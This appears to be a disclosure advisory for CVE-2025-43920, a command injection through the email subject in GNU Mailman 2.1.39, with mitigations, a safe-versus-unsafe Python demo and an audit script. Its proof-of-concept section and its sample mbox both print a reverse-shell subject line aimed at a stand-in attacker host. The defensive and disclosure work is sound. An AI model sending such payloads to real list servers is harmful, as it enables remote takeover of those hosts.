Related vulnerability
Title:
GNU Mailman security vulnerability
(CVE-2025-43920)
Description: GNU Mailman is free software from the GNU community (United States) for managing e-mail discussions and mailing lists. It integrates with web projects so that users can conveniently manage their list subscriptions, and it provides built-in archiving, automatic forwarding, content filtering and anti-spam filters. GNU Mailman 2.1.39 contains a security vulnerability caused by unfiltered special characters in the mail subject, which may lead to arbitrary command execution.
Introduction
# CVE-2025-43920: Command Injection via Email Subject in GNU Mailman 2.1.39 (cPanel/WHM Bundle)
**Discovered by:** Firudin Davudzada & Musazada Aydan\
**Disclosure Date:** April 2025\
**CVE ID:** CVE-2025-43920\
**Severity:** 5.4 Medium (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)\
**Attack Type:** Remote\
**Affected Software:** GNU Mailman 2.1.39 (bundled with cPanel/WHM)
## Overview
GNU Mailman 2.1.39, as bundled with cPanel and WHM, is vulnerable to a command injection flaw that allows unauthenticated attackers to execute arbitrary operating system commands on the list server. The vulnerability is reachable only when an external archiver is configured through `PUBLIC_EXTERNAL_ARCHIVER` or `PRIVATE_EXTERNAL_ARCHIVER` in the `mm_cfg.py` configuration file, and it triggers when the subject line of a posted message contains shell metacharacters that reach the archiver command unsanitized (this precondition is why the CVSS vector above rates attack complexity High and the overall score Medium). Once triggered, the impact is full compromise of the Mailman process: attackers can establish reverse shells, exfiltrate data, or perform other malicious actions with that process's privileges.
## Vulnerability Details
- **Vulnerability Type:** Command Injection (OS command injection through a shell-expanded template)
- **Vendor:** GNU Mailman
- **Affected Versions:** Mailman 2.1.39; older 2.1.x releases are likely affected as well (pending regression testing)
- **Affected Components:**
- External archiver configuration (`PUBLIC_EXTERNAL_ARCHIVER`, `PRIVATE_EXTERNAL_ARCHIVER`), whose value is a command template run through the shell for every archived message
- `Mailman/Handlers/` (the message pipeline that rewrites the subject, for example the list-prefix handling in `CookHeaders.py`, and then hands the message to the archiver)
- **Root Cause:** When an external archiver is configured, the message subject can end up inside the shell command string without escaping or quoting. Any shell metacharacter in the subject (for example `;`, `&`, `|`, backticks or `$(...)`) then terminates or extends the intended command, so the sender of the message chooses what the server runs.
- **Status:** No official fix available. Mailman 2.1.x is end-of-life (EOL); migration to Mailman 3.x is strongly recommended.
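The following Python 3 snippet is an added illustration written for this page; it is not Mailman's own code. It models the reported flaw with a hypothetical archiver template that interpolates the message subject (`%(subject)s` is our placeholder for illustration; Mailman 2.1 templates only define `%(listname)s` and `%(hostname)s`, and the message itself is written to the archiver's standard input) and runs the result through `/bin/sh`, next to the hardened form a practitioner should use: split the template into argv tokens first, substitute per token, and execute without a shell. `echo` stands in for a real archiver so the example runs anywhere.

```python
"""Added example (not Mailman's code): shell-expanded archiver template vs.
argv-based execution. Placeholder %(subject)s, TEMPLATE and the function
names are assumptions made for this illustration."""
import shlex
import subprocess
from email.message import EmailMessage

# Hypothetical archiver command template; `echo` stands in for a real archiver.
TEMPLATE = "echo archiving %(listname)s: %(subject)s"


def build_message(subject: str, body: str = "hello list") -> EmailMessage:
    """Construct a minimal list post with the given Subject (sample input)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "list@example.com"
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def archive_unsafe(template: str, listname: str, msg: EmailMessage) -> str:
    """Vulnerable pattern: header text is interpolated into one shell string.

    `;`, `|`, `&`, backticks or `$(...)` in the Subject become shell syntax,
    so the sender decides what runs. Returns the shell's stdout for inspection.
    """
    cmd = template % {"listname": listname, "subject": str(msg["Subject"])}
    proc = subprocess.run(cmd, shell=True, input=msg.as_bytes(),
                          capture_output=True, check=False)
    return proc.stdout.decode()


def archive_safe(template: str, listname: str, msg: EmailMessage) -> str:
    """Hardened pattern: tokenize the template first, substitute per argv
    token, then exec without a shell. Whatever the Subject contains, it is
    delivered as a single argument, never parsed as shell syntax.
    """
    fields = {"listname": listname, "subject": str(msg["Subject"])}
    # A token with no % specifiers is returned unchanged by the % operator.
    argv = [token % fields for token in shlex.split(template)]
    proc = subprocess.run(argv, shell=False, input=msg.as_bytes(),
                          capture_output=True, check=False)
    return proc.stdout.decode()


if __name__ == "__main__":
    evil = build_message("; echo INJECTED")
    print("unsafe:", repr(archive_unsafe(TEMPLATE, "test-list", evil)))
    print("safe:  ", repr(archive_safe(TEMPLATE, "test-list", evil)))
```

With the subject `; echo INJECTED`, the unsafe path prints `INJECTED` on its own line because the shell saw two commands; the safe path prints the subject verbatim as part of a single `echo` argument. The same split-then-substitute approach keeps `%(listname)s` and `%(hostname)s` working for a real archiver command, so it costs nothing in functionality.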
## Proof of Concept
To exploit this vulnerability, an attacker can send an email to a Mailman-managed list with a malicious subject line, such as:
```bash
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
```
**Prerequisites:**
- The target Mailman list must have an external archiver configured via `PUBLIC_EXTERNAL_ARCHIVER` or `PRIVATE_EXTERNAL_ARCHIVER`.
- The attacker must control a mail server or client capable of sending to the target list.
- A listener (e.g., `netcat`) must be set up on `ATTACKER_IP:4444` to receive the reverse shell.
**Expected Outcome:** If the external archiver command does not sanitize the subject line, the malicious command executes on the server, establishing a reverse shell to the attacker’s server.
## Attack Vectors
- **Primary Vector:** Malicious email subject lines containing shell metacharacters sent to a Mailman-managed mailing list with an external archiver configured.
- **Exploitation Scenarios:**
- Establish reverse shells for persistent access.
- Execute commands to exfiltrate data, modify configurations, or install malware.
- Chain with other vulnerabilities to escalate attacks.
- **Ease of Exploitation:** High once the precondition is met: any email sender can target a public or misconfigured list that has an external archiver configured, with no authentication or user interaction. The CVSS attack complexity is rated High only because that non-default archiver configuration must be present.
## Security Impact
- **Code Execution:** High (arbitrary OS command execution).
- **Privilege Escalation:** High (injected commands run with the privileges of the Mailman runner process, normally the `mailman` service user; root is reachable only if the archiver runs with elevated privileges or via a further local escalation).
- **Information Disclosure:** High (command output can reveal system data).
- **Denial of Service:** High (malicious commands can crash or overload the server).
## Mitigations
### Immediate Actions
- **Disable External Archivers:** Set `PUBLIC_EXTERNAL_ARCHIVER` and `PRIVATE_EXTERNAL_ARCHIVER` to `None` in `mm_cfg.py` to disable external archiver functionality:
```python
PUBLIC_EXTERNAL_ARCHIVER = None
PRIVATE_EXTERNAL_ARCHIVER = None
```
- **Sanitize Inputs:** If an external archiver is required, make sure no header text (subject, sender, list name) is interpolated into a shell command string: the archiver should read the message from standard input and be invoked as an argument vector without a shell, or the template must quote every substituted value. Treat any metacharacter in a header as hostile rather than trying to strip a blacklist of characters.
- **Restrict Subscriptions:** Limit posting and subscriptions to trusted users, and hold non-member posts for moderation, to reduce exposure.
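To find out whether a host is exposed and whether anyone has already tried this, here is an added audit helper (written for this page, not part of the advisory or of Mailman). It checks an `mm_cfg.py` text for archiver settings that are not `None` and scans an mbox (a list archive or mail spool) for Subject headers carrying shell metacharacters, decoding RFC 2047 encoded-words first so a base64-wrapped payload cannot hide. The config excerpt and mbox below are constructed sample data.

```python
"""Added audit helper (not from the advisory or Mailman). SAMPLE_CFG and
SAMPLE_MBOX are constructed inputs for this example."""
import email
import re
from email import policy

ARCHIVER_SETTINGS = ("PUBLIC_EXTERNAL_ARCHIVER", "PRIVATE_EXTERNAL_ARCHIVER")
# Characters that change meaning under /bin/sh when interpolated unquoted.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n]")

SAMPLE_CFG = """\
# constructed mm_cfg.py excerpt
DEFAULT_URL_HOST = 'lists.example.com'
PUBLIC_EXTERNAL_ARCHIVER = '/usr/local/bin/archive-public %(listname)s'
PRIVATE_EXTERNAL_ARCHIVER = None
"""

SAMPLE_MBOX = """\
From alice@example.com Mon Apr 14 10:00:00 2025
From: alice@example.com
To: list@example.com
Subject: Meeting notes

See you Monday.
From mallory@example.com Mon Apr 14 10:05:00 2025
From: mallory@example.com
To: list@example.com
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

payload
From mallory@example.com Mon Apr 14 10:06:00 2025
From: mallory@example.com
To: list@example.com
Subject: =?utf-8?b?OyBpZA==?=

the encoded-word above decodes to "; id"
"""


def external_archivers_enabled(cfg_text: str) -> dict:
    """Return {setting: value} for archiver settings whose value is not None.

    Comment handling is line-based (everything after '#' is dropped), which is
    enough for the simple assignments found in mm_cfg.py.
    """
    enabled = {}
    for line in cfg_text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"^(\w+_EXTERNAL_ARCHIVER)\s*=\s*(.+)$", line)
        if m and m.group(1) in ARCHIVER_SETTINGS and m.group(2).strip() != "None":
            enabled[m.group(1)] = m.group(2).strip().strip("'\"")
    return enabled


def find_suspicious_subjects(mbox_text: str) -> list:
    """Return (sender, decoded_subject) pairs for messages whose Subject
    contains shell metacharacters. policy.default decodes encoded-words, so
    base64 or quoted-printable wrapping does not hide the payload."""
    hits = []
    # mbox messages are separated by "From " lines (no colon); split on those.
    for raw in re.split(r"^From .*\n", mbox_text, flags=re.M):
        if not raw.strip():
            continue
        msg = email.message_from_string(raw, policy=policy.default)
        subject = str(msg["Subject"] or "")
        if SHELL_META.search(subject):
            hits.append((str(msg["From"]), subject))
    return hits


if __name__ == "__main__":
    print("external archivers:", external_archivers_enabled(SAMPLE_CFG))
    for sender, subject in find_suspicious_subjects(SAMPLE_MBOX):
        print(f"suspicious subject from {sender}: {subject!r}")
```

Point `external_archivers_enabled` at the real `mm_cfg.py` and `find_suspicious_subjects` at each list's `archives/private/<list>.mbox/<list>.mbox` file; a non-empty result from the first means the host meets the precondition, and any hit from the second deserves a look at the archiver's process accounting or shell history for that time window.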
### Long-Term Solutions
- **Upgrade to Mailman 3.x:** Migrate to Mailman 3.x, which is actively maintained and whose archiver interface is plugin-based rather than a shell command template, so message headers are never expanded into a shell command.
- **Disable Email Processing:** If a list does not need to accept posts by email, disable inbound mail processing for it (or hold all posts for moderation) to remove the attack vector.
- **Harden Environment:** Run Mailman in a containerized environment with minimal privileges to limit the impact of potential exploits.
## Timeline
- **Q1 2025:** Discovered during authorized penetration testing assessment.
- **Q1 2025:** Reported to GNU Mailman and cPanel maintainers.
- **April 2025:** CVE assigned by MITRE.
- **April 2025:** Public disclosure via this repository.
## References
- [Mailman 2.1 Source Code](https://code.launchpad.net/~mailman-coders/mailman/2.1)
- [CVE-2025-43920 Record](https://www.cve.org/CVERecord?id=CVE-2025-43920)
- [Mailman Security Recommendations](https://wiki.list.org/DOC/Mailman%202.1%20List%20Administrators%20Manual)
- [INCIBE-CERT - CVE-2025-43920](https://www.incibe.es/index.php/en/incibe-cert/early-warning/vulnerabilities/cve-2025-43920)
- [VULDB - CVE-2025-43920](https://vuldb.com/it/?id.305745)
- [National Institute of Standards and Technology (NIST) - CVE-2025-43920](https://nvd.nist.gov/vuln/detail/CVE-2025-43920)
- [Tenable - CVE-2025-43920](https://www.tenable.com/cve/CVE-2025-43920)
## Acknowledgments
Firudin Davudzada and Musazada Aydan responsibly disclosed this vulnerability during a sanctioned penetration testing engagement. Thanks to the MITRE CVE team for coordination.
## Contact
**Email:** security@datricon.com\
File snapshot
[4.0K] /data/pocs/f35e189663ce8ed415d2b2d02d95e95b14f8011b
└── [5.4K] README.md
0 directories, 1 file
Notes
1. Accessing the original source is recommended.
2. If the source is unavailable or cannot be reached, send an email to f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.